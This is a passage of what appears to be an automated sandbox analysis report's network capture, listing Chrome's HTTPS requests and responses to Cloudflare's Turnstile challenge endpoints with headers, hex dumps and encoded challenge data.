                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:45 UTC3402OUTData Raw: 76 5f 38 66 66 66 37 64 35 32 34 63 34 36 38 63 39 35 3d 75 6b 70 49 78 49 77 49 34 49 36 49 7a 6d 2d 35 6d 2d 4d 49 6d 53 64 57 44 63 53 2d 56 6d 74 74 2d 25 32 62 73 2d 64 65 49 6d 47 2d 4a 49 64 70 63 64 37 47 70 2d 69 32 47 2d 59 51 6d 42 75 2d 52 49 6d 4d 70 2d 64 24 4b 6b 50 6c 2d 24 57 2d 38 2d 6d 6b 2d 24 70 48 65 2d 73 2d 50 65 64 74 2d 57 65 32 70 2d 4c 70 70 50 63 2d 52 30 44 32 7a 45 36 54 55 34 30 2d 6b 38 65 50 4e 2d 71 74 4b 32 30 62 79 35 59 41 48 64 50 49 32 4d 76 64 62 76 49 50 71 2d 64 77 62 2d 4a 68 6e 52 2d 75 4e 2d 44 37 53 2d 4a 63 2d 46 74 77 30 2d 67 45 42 54 62 63 66 48 30 4a 50 56 38 68 6b 6a 53 50 58 35 6d 63 65 32 70 50 52 71 65 2d 7a 77 74 33 71 2d 2d 76 64 2d 6d 56 2d 7a 49 75 54 59 2d 50 61 48 6c 4b 2d 41 7a 6b 57 4d 65 75
                                                                              Data Ascii: v_8fff7d524c468c95=ukpIxIwI4I6Izm-5m-MImSdWDcS-Vmtt-%2bs-deImG-JIdpcd7Gp-i2G-YQmBu-RImMp-d$KkPl-$W-8-mk-$pHe-s-Pedt-We2p-LppPc-R0D2zE6TU40-k8ePN-qtK20by5YAHdPI2MvdbvIPq-dwb-JhnR-uN-D7S-Jc-Ftw0-gEBTbcfH0JPV8hkjSPX5mce2pPRqe-zwt3q--vd-mV-zIuTY-PaHlK-AzkWMeu
                                                                              2025-01-10 20:41:46 UTC751INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:46 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 152976
                                                                              Connection: close
                                                                              cf-chl-gen: sZTX6VlMQduqsIakTqHjljU3d/OwovWI10DCiLNqIO++xIuvIR5aVXlBGgrM+xN0MfJdRi2aEdm+9WYARrw9/vLpH8lXIE6wwY3oeNbOlhcPFcg6EVi0xEisI9wTPdnRHXHi63/yThusfo/jmUa3ojerDsJAx5Zj3IgBEMFit20yaT4CjE0Q1jDDKEEH6OGfm3pylj39WsUrG0GK8AMlBNXV1QlvXmPOErBkfjcTX2pr39qtaF0LaugvFp/PjmjlvWJRsb4Kt6dqQVlquUfeoo6vLvhu8PPApO32TIPnYDBKqd5KmZwCm5JAUrx9yO5wjUR3BumSAqM26DJ+PsQp+O4VMnou57JhindM6FkWb/fCZMq5Lk/6vyXof6lEhAQ65wlxVWQUmq5Iu2OBu+tZezBKtQa+PZL0E0hWxscogQomxgqbFWCN/VvSDpsv146ZDiwEfZdfupX9uBCXnEBgTq+VvKTJTktkDV7fgMG1DcI=$dhjI/sK9gOA4VZd9z0Y4DQ==
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d5ebed515bb-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:46 UTC618INData Raw: 71 49 6d 33 73 5a 36 65 74 4b 53 56 78 35 50 41 66 70 61 57 69 59 75 48 6f 63 75 55 71 39 50 49 79 34 2b 36 73 37 4b 30 71 71 79 67 33 38 7a 54 31 35 75 2b 76 37 37 41 74 73 53 32 32 36 58 68 34 36 66 43 79 38 72 4e 73 4c 4f 30 30 4d 54 61 75 39 62 47 75 72 62 2b 33 74 66 45 39 65 44 6d 78 39 4c 53 42 73 6e 6a 39 77 6e 4d 35 78 41 47 7a 77 49 49 7a 77 7a 4c 31 66 50 75 47 78 7a 5a 33 78 38 67 33 65 50 37 4b 4f 58 6c 32 78 77 65 49 4e 2f 6c 43 41 62 6e 2f 76 77 43 4a 42 4d 58 43 51 73 6f 4e 67 6b 4a 4b 50 6e 39 38 7a 77 35 41 76 64 49 41 42 70 4c 50 51 4d 69 4a 78 68 49 4b 67 52 4f 53 30 45 79 4d 55 51 76 46 43 73 72 47 6a 63 6e 57 53 41 55 5a 46 30 6c 59 31 78 69 4d 6b 45 32 61 79 6b 71 58 47 6c 5a 55 57 4a 41 61 6d 64 79 61 58 68 56 62 6b 39 57 4f 48 6b
                                                                              Data Ascii: qIm3sZ6etKSVx5PAfpaWiYuHocuUq9PIy4+6s7K0qqyg38zT15u+v77AtsS226Xh46fCy8rNsLO00MTau9bGurb+3tfE9eDmx9LSBsnj9wnM5xAGzwIIzwzL1fPuGxzZ3x8g3eP7KOXl2xweIN/lCAbn/vwCJBMXCQsoNgkJKPn98zw5AvdIABpLPQMiJxhIKgROS0EyMUQvFCsrGjcnWSAUZF0lY1xiMkE2aykqXGlZUWJAamdyaXhVbk9WOHk
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 46 4b 52 57 47 4d 67 6e 69 43 65 49 4a 36 6a 48 78 61 61 47 69 61 59 6c 6c 76 59 57 4b 57 6c 61 4a 71 67 6f 69 4f 61 6f 43 64 70 6f 65 73 6b 4c 61 72 64 5a 5a 77 6a 72 5a 79 6d 70 53 62 69 38 4c 43 6f 6e 76 46 66 38 57 45 73 38 69 36 6d 4b 69 36 72 70 79 61 76 71 7a 52 30 73 47 32 73 35 65 35 6c 4d 65 6c 73 74 57 72 30 72 62 65 31 4c 79 38 34 37 69 31 76 73 47 34 31 64 79 36 36 4d 7a 66 30 4e 2f 45 7a 73 6e 35 74 72 57 78 2b 72 6e 77 41 64 66 51 39 66 62 62 33 2f 66 35 34 66 59 47 39 4f 62 57 42 41 2f 39 43 64 37 65 43 73 37 53 37 52 62 56 44 66 59 48 39 50 58 62 39 67 44 2b 44 66 7a 68 41 78 45 42 36 41 63 56 42 65 6f 4c 47 51 72 35 44 78 30 4e 36 78 4d 68 45 67 51 58 4a 52 59 4a 47 79 6b 61 45 68 38 74 48 68 63 6a 4d 53 49 59 4a 7a 55 6d 48 53 73 35 4b
                                                                              Data Ascii: FKRWGMgniCeIJ6jHxaaGiaYllvYWKWlaJqgoiOaoCdpoeskLardZZwjrZympSbi8LConvFf8WEs8i6mKi6rpyavqzR0sG2s5e5lMelstWr0rbe1Ly847i1vsG41dy66Mzf0N/Ezsn5trWx+rnwAdfQ9fbb3/f54fYG9ObWBA/9Cd7eCs7S7RbVDfYH9PXb9gD+DfzhAxEB6AcVBeoLGQr5Dx0N6xMhEgQXJRYJGykaEh8tHhcjMSIYJzUmHSs5K
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 6e 6c 46 6c 6c 69 48 5a 74 67 49 46 39 6c 4a 79 52 6e 70 31 2b 64 6d 43 43 59 33 70 6b 69 48 78 2b 61 49 79 51 67 6d 79 50 71 6f 5a 77 6b 33 4f 4b 64 4a 6d 57 6e 4a 71 63 73 70 4a 38 6f 61 65 45 6b 61 4b 30 70 5a 6d 57 6e 38 61 61 30 4e 4c 4d 30 35 58 57 30 4d 71 5a 32 74 54 4e 6e 64 37 59 31 4b 48 69 33 4e 65 6c 35 75 44 65 71 65 72 6b 34 61 33 75 36 4e 71 78 38 75 7a 66 77 39 44 31 2b 63 2f 55 75 37 6e 54 32 50 37 76 31 39 79 2b 77 4e 76 67 41 51 6e 6a 44 66 34 50 34 52 44 4c 42 2b 72 65 37 74 30 4b 79 51 2f 78 37 39 48 7a 31 64 7a 6f 2f 4f 7a 79 2b 66 6a 65 4a 75 45 70 41 2f 4c 36 42 52 66 73 4a 51 37 73 48 2f 37 30 46 66 4d 6e 41 54 6f 45 46 42 30 53 2b 55 45 68 38 7a 41 5a 4d 6a 55 54 45 67 63 2b 43 7a 67 67 52 77 30 47 4c 53 55 54 55 42 4d 4f 46 77
                                                                              Data Ascii: nlFlliHZtgIF9lJyRnp1+dmCCY3pkiHx+aIyQgmyPqoZwk3OKdJmWnJqcspJ8oaeEkaK0pZmWn8aa0NLM05XW0MqZ2tTNnd7Y1KHi3Nel5uDeqerk4a3u6Nqx8uzfw9D1+c/Uu7nT2P7v19y+wNvgAQnjDf4P4RDLB+re7t0KyQ/x79Hz1dzo/Ozy+fjeJuEpA/L6BRfsJQ7sH/70FfMnAToEFB0S+UEh8zAZMjUTEgc+CzggRw0GLSUTUBMOFw
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 69 48 6c 79 66 6f 78 39 63 34 4b 51 67 58 69 47 6c 49 57 42 62 6f 68 39 67 33 36 63 6a 59 71 6e 71 59 47 43 74 59 65 56 6d 35 43 33 6a 37 4b 51 76 49 2f 47 6c 4c 2b 66 79 70 6a 44 6e 38 36 63 78 36 2f 53 6f 4d 75 76 79 71 36 69 74 71 48 4e 6a 63 2f 55 79 72 57 30 34 65 47 66 7a 74 61 36 70 74 54 48 6f 70 33 61 78 63 50 73 32 72 75 79 79 63 76 30 74 50 66 54 34 38 7a 6b 38 4f 6e 38 31 38 6e 70 30 4c 58 41 76 66 45 46 77 50 62 39 35 41 6a 67 44 4d 33 75 79 73 34 46 30 2f 54 54 35 51 7a 55 31 52 7a 6e 37 42 49 51 39 43 49 69 33 53 59 46 34 69 66 77 35 4f 6e 7a 41 51 72 33 4d 41 77 63 42 52 30 6c 4a 54 55 51 41 69 4c 36 46 54 67 52 4f 52 67 4b 2f 52 48 31 41 66 30 79 4f 68 45 41 4b 50 31 46 51 41 34 35 4b 69 49 76 50 53 34 6e 4d 30 45 79 4b 44 64 46 4e 69 30
                                                                              Data Ascii: iHlyfox9c4KQgXiGlIWBboh9g36cjYqnqYGCtYeVm5C3j7KQvI/GlL+fypjDn86cx6/SoMuvyq6itqHNjc/UyrW04eGfzta6ptTHop3axcPs2ruyycv0tPfT48zk8On818np0LXAvfEFwPb95AjgDM3uys4F0/TT5QzU1Rzn7BIQ9CIi3SYF4ifw5OnzAQr3MAwcBR0lJTUQAiL6FTgRORgK/RH1Af0yOhEAKP1FQA45KiIvPS4nM0EyKDdFNi0
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 6d 57 54 6e 33 46 6e 72 47 4b 6d 68 61 47 64 71 6e 36 4a 72 70 57 4f 6a 62 57 33 63 4a 4f 63 6d 48 53 75 6e 49 75 62 77 62 57 45 6a 73 57 62 77 6f 66 48 78 71 32 6d 70 63 71 6a 71 6f 76 55 74 4a 4f 67 6f 4a 57 57 73 72 76 53 6d 72 43 73 6d 38 2b 75 6f 63 44 5a 31 75 58 6d 31 63 6e 6d 77 73 32 6e 33 65 71 2b 76 74 37 42 78 4d 2f 78 73 4c 6e 37 78 75 72 35 35 2f 76 4d 30 51 50 78 2f 74 4c 53 39 66 76 54 76 63 4c 46 7a 41 44 35 45 51 37 66 39 65 34 53 34 77 54 79 46 75 63 65 31 65 72 37 46 2f 6f 65 37 39 33 37 2f 76 50 32 34 41 54 39 47 68 59 5a 43 77 55 61 4c 51 73 4a 48 69 33 74 44 53 49 78 4b 78 6e 35 2f 54 55 75 4f 69 73 6a 44 79 55 45 45 52 45 45 43 53 4d 73 52 67 34 43 4c 46 41 4f 56 53 77 6c 53 6b 64 58 55 45 39 54 45 79 63 6e 50 56 74 4c 49 52 35 43
                                                                              Data Ascii: mWTn3FnrGKmhaGdqn6JrpWOjbW3cJOcmHSunIubwbWEjsWbwofHxq2mpcqjqovUtJOgoJWWsrvSmrCsm8+uocDZ1uXm1cnmws2n3eq+vt7BxM/xsLn7xur55/vM0QPx/tLS9fvTvcLFzAD5EQ7f9e4S4wTyFuce1er7F/oe7937/vP24AT9GhYZCwUaLQsJHi3tDSIxKxn5/TUuOisjDyUEEREECSMsRg4CLFAOVSwlSkdXUE9TEycnPVtLIR5C
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 6c 6d 64 71 75 75 70 4b 53 4f 6c 58 53 52 63 34 36 59 74 57 32 32 68 5a 4f 61 69 6f 43 52 78 4a 71 4f 77 4c 4b 31 77 70 61 57 75 63 65 4f 75 38 6e 53 6a 71 71 66 78 71 61 76 79 35 6d 5a 6c 71 72 63 6c 70 48 61 75 62 57 36 32 64 6d 6c 6d 63 66 6b 71 74 66 6c 33 36 71 68 78 4e 2f 7a 77 71 37 71 7a 73 4c 47 30 2b 32 74 39 74 58 54 2f 73 2f 36 77 76 48 58 41 4e 66 6f 31 4d 4c 33 31 37 37 6f 41 73 66 63 38 4f 33 77 34 50 54 78 39 73 72 52 46 65 54 7a 30 39 62 36 45 68 37 37 32 75 77 6c 47 52 67 55 38 51 51 4d 39 67 33 71 4b 41 73 52 37 67 33 38 37 76 51 6c 47 43 2f 32 38 54 49 2f 2f 69 77 56 2b 55 49 37 48 42 38 63 50 55 51 6e 50 51 5a 4a 54 53 51 4b 55 43 6c 46 45 44 30 51 46 46 59 68 45 69 34 54 56 30 73 7a 47 79 39 68 47 78 5a 66 50 6a 77 61 61 69 49 6f 61
                                                                              Data Ascii: lmdquupKSOlXSRc46YtW22hZOaioCRxJqOwLK1wpaWuceOu8nSjqqfxqavy5mZlqrclpHaubW62dmlmcfkqtfl36qhxN/zwq7qzsLG0+2t9tXT/s/6wvHXANfo1ML3177oAsfc8O3w4PTx9srRFeTz09b6Eh772uwlGRgU8QQM9g3qKAsR7g387vQlGC/28TI//iwV+UI7HB8cPUQnPQZJTSQKUClFED0QFFYhEi4TV0szGy9hGxZfPjwaaiIoa
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 2b 67 6f 2b 6f 6b 71 4e 34 6c 58 65 53 6a 34 64 32 69 4d 43 30 75 70 42 2f 73 35 4e 36 70 4c 72 45 75 63 61 57 6d 71 7a 44 72 4b 79 54 31 73 54 41 70 37 69 58 32 71 53 58 6e 4c 61 2f 32 61 47 56 76 2b 4f 68 35 37 53 36 31 39 6a 43 74 75 6a 61 33 65 71 2b 76 4b 76 55 71 4f 50 78 36 61 7a 6e 35 73 75 2b 36 2f 6d 34 77 75 2f 74 42 63 4d 46 33 4f 6a 48 76 51 59 41 7a 76 76 62 42 4f 4d 44 37 77 66 6d 34 74 54 5a 36 68 7a 72 36 77 77 62 44 68 6e 75 37 76 66 68 34 69 55 57 47 2f 6f 41 47 51 30 48 43 2f 6b 4a 4c 75 55 6e 44 67 6f 6c 44 43 33 33 4f 53 6f 77 2f 53 77 2b 4f 76 77 4f 4f 53 38 38 42 78 55 53 4b 55 45 5a 46 79 30 2f 54 6b 38 2b 4d 6a 49 69 46 52 42 47 55 69 63 6e 53 7a 73 62 58 45 70 62 48 31 73 78 49 44 49 67 51 30 51 68 4e 44 73 39 4c 47 68 4c 55 54
                                                                              Data Ascii: +go+okqN4lXeSj4d2iMC0upB/s5N6pLrEucaWmqzDrKyT1sTAp7iX2qSXnLa/2aGVv+Oh57S619jCtuja3eq+vKvUqOPx6azn5su+6/m4wu/tBcMF3OjHvQYAzvvbBOMD7wfm4tTZ6hzr6wwbDhnu7vfh4iUWG/oAGQ0HC/kJLuUnDgolDC33OSow/Sw+OvwOOS88BxUSKUEZFy0/Tk8+MjIiFRBGUicnSzsbXEpbH1sxIDIgQ0QhNDs9LGhLUT
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 6c 58 65 53 6a 37 6c 78 75 6f 6d 58 6e 62 6d 2f 6c 63 69 65 6b 73 53 32 75 63 61 61 6d 72 33 4c 6b 72 2f 4e 31 70 4b 75 6f 38 71 71 73 38 2b 64 6e 5a 71 75 34 4a 71 56 33 72 32 35 31 4c 76 63 70 2b 6a 5a 33 36 33 62 37 65 6e 6c 70 65 62 4e 78 64 44 6c 74 62 66 33 7a 37 6d 36 2f 65 6d 35 76 77 48 66 76 63 49 46 31 77 4c 4a 43 2f 6b 48 79 77 7a 72 79 63 33 70 37 41 72 6a 37 65 77 49 38 52 4d 48 44 2f 4c 65 41 74 50 61 31 51 58 39 2b 42 55 57 48 75 6f 5a 49 69 44 75 43 42 72 74 38 67 73 45 38 66 51 42 45 43 37 73 4b 52 67 39 2f 69 77 36 4e 50 31 45 45 42 73 37 46 42 55 36 4a 6b 31 4c 52 55 4d 4d 42 78 73 62 49 55 78 56 48 7a 56 50 51 78 6b 57 4f 6b 34 35 4e 69 46 42 49 46 4d 74 49 54 52 55 55 6c 34 6f 48 6c 56 48 52 47 34 78 54 6d 56 78 63 7a 39 6d 4b 6e 46
                                                                              Data Ascii: lXeSj7lxuomXnbm/lcieksS2ucaamr3Lkr/N1pKuo8qqs8+dnZqu4JqV3r251Lvcp+jZ363b7enlpebNxdDltbf3z7m6/em5vwHfvcIF1wLJC/kHywzryc3p7Arj7ewI8RMHD/LeAtPa1QX9+BUWHuoZIiDuCBrt8gsE8fQBEC7sKRg9/iw6NP1EEBs7FBU6Jk1LRUMMBxsbIUxVHzVPQxkWOk45NiFBIFMtITRUUl4oHlVHRG4xTmVxcz9mKnF
                                                                              2025-01-10 20:41:46 UTC1369INData Raw: 48 74 2f 77 59 78 39 6c 37 6d 6b 74 70 36 47 6d 73 79 47 67 63 71 70 70 34 58 56 6a 5a 50 55 72 38 75 5a 73 62 44 4d 71 4c 36 61 34 74 44 4d 73 38 53 6a 35 72 44 6b 71 65 66 4c 35 61 36 68 79 2f 43 76 70 65 7a 55 73 39 44 41 35 4d 65 78 38 66 57 35 2f 50 58 32 79 77 48 6a 2f 63 62 65 35 2f 33 4a 39 77 59 50 32 38 45 4f 43 73 37 71 38 77 54 53 34 66 6a 31 31 52 7a 6b 7a 78 49 67 39 43 4d 69 47 65 49 46 34 68 66 77 4a 65 6b 70 2b 79 6a 73 39 77 7a 70 37 51 6f 51 4a 77 63 4d 38 52 6f 54 46 67 34 56 46 67 6f 31 4b 7a 67 44 45 51 34 6c 50 52 55 54 4b 54 74 4b 53 7a 6f 75 50 43 63 52 44 45 4a 4f 49 79 4e 48 4e 78 64 59 52 6c 63 62 56 79 30 63 4c 68 77 2f 51 42 30 77 4e 7a 6b 6f 5a 45 64 4e 4c 45 6b 35 58 55 41 71 61 6d 34 79 64 57 35 76 52 48 6c 63 64 6a 39 58
                                                                              Data Ascii: Ht/wYx9l7mktp6GmsyGgcqpp4XVjZPUr8uZsbDMqL6a4tDMs8Sj5rDkqefL5a6hy/CvpezUs9DA5Mex8fW5/PX2ywHj/cbe5/3J9wYP28EOCs7q8wTS4fj11RzkzxIg9CMiGeIF4hfwJekp+yjs9wzp7QoQJwcM8RoTFg4VFgo1KzgDEQ4lPRUTKTtKSzouPCcRDEJOIyNHNxdYRlcbVy0cLhw/QB0wNzkoZEdNLEk5XUAqam4ydW5vRHlcdj9X


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.549776104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:48 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8fff7d524c468c95/1736541706063/t6T-xS85SQCUhhd HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:48 UTC200INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:48 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d6c7be343c1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:48 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5f 00 00 00 36 08 02 00 00 00 2e d5 d2 30 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR_6.0IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.549775104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:48 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:48 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Fri, 10 Jan 2025 20:41:48 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: 8Qu6RrvNdVdDW9McKQPOxC+Z4OvHsSy6c4K5plk+h0S/edYDvuvvWKgnbzwG/V5K1KGDsoPlOGkXeBap/C5W5w==$TscKFboGsOTXL4wG2I0p0A==
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d6c6b8c80e2-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:48 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.549779104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:48 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8fff7d524c468c95/1736541706065/35a236f1c8661b11e1fffc2bc8c9301701b2cbbc359ceafaac4bbcb309ba4b49/_ArrUB3Pi9YFLdw HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:49 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Fri, 10 Jan 2025 20:41:49 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2025-01-10 20:41:49 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4e 61 49 32 38 63 68 6d 47 78 48 68 5f 5f 77 72 79 4d 6b 77 46 77 47 79 79 37 77 31 6e 4f 72 36 72 45 75 38 73 77 6d 36 53 30 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gNaI28chmGxHh__wryMkwFwGyy7w1nOr6rEu8swm6S0kAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2025-01-10 20:41:49 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.549778104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:48 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8fff7d524c468c95/1736541706063/t6T-xS85SQCUhhd HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:49 UTC200INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:49 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d719ef4c326-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:49 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5f 00 00 00 36 08 02 00 00 00 2e d5 d2 30 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDR_6.0IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.549786104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:49 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 32585
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
